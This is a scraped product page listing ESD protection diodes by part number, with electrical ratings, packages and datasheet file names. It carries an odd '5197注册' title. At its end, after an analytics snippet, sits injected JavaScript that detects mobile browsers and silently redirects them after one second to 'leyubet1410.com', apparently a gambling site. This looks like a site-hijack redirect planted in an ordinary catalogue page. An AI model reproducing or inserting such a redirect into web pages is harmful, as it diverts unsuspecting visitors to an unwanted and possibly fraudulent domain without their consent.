5197注册

  • EN

ESD Protection

Part Number Reverse Stand-off Voltage Reverse Breakdown Voltage Reverse Leakage Current Clamping Voltage Max. Clamping Voltage Peak Pulse Current Off-State Capacitance Peak Pulse Power (8/20uS) ESD Air(kV) ESD Contact(kV) Direction Package download
VRWM(V) VBR(min)(V) IR(uA) VC(V) @ 1A VC(V) @ Ipp Ipp(A) CJ(pF) Ppp(W)
YSESDP4SMF48A 48 53.3 1 - 77.4 5.2 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF5.0A 5 6.4 400 - 9.2 43.5 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF51A 51 56.7 1 - 82.4 4.9 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF54A 54 60 0.1 - 87.1 4.6 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF58A 58 64.4 1 - 93.6 4.2 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF6.0A 6 6.67 400 - 10.3 38.8 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF6.5A 6.5 7.22 250 - 11.2 35.7 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF60A 60 66.7 0.1 - 96.8 4.1 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF64A 64 71.1 0.1 - 103 3.9 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF7.0A 7 7.78 100 - 12 33.3 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF7.5A 7.5 8.33 50 - 12.9 31 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF8.0A 8 8.89 25 - 13.6 29.4 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF8.5A 8.5 9.44 10 - 14.4 27.8 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF9.0A 9 10 5 - 15.4 26 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDU5V0SP-04C 5 6 0.1 15 20 3 0.6 60 15 8 Bi 0402/SOD-923F YSESDU5V0SP-04C_REV.03_20200506.pdf
YSLC05CH 5 6 5 12 - 17 1 300 15 8 Array SOT-23 YSLC05CH_REV.05_20200506.pdf
YSLVU2.8-4 2.8 3 1 7.6 25 24 3 600 15 8 Array SOP-8 YSLVU2.8-4_REV.02_20200506.pdf
YSM712 7 7.5 20 10 15 12 65 400 15 8 Array SOT-23 YSM712_REV.06_20200506.pdf
YSM712 12 13.3 1 18 28 12 65 400 15 8 Array SOT-23 YSM712_REV.06_20200506.pdf
YSMF05C 5 6 0.1 10 13 2.5 20 50 15 8 Array SOT-363 YSMF05C_REV.01_20200630.pdf
var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();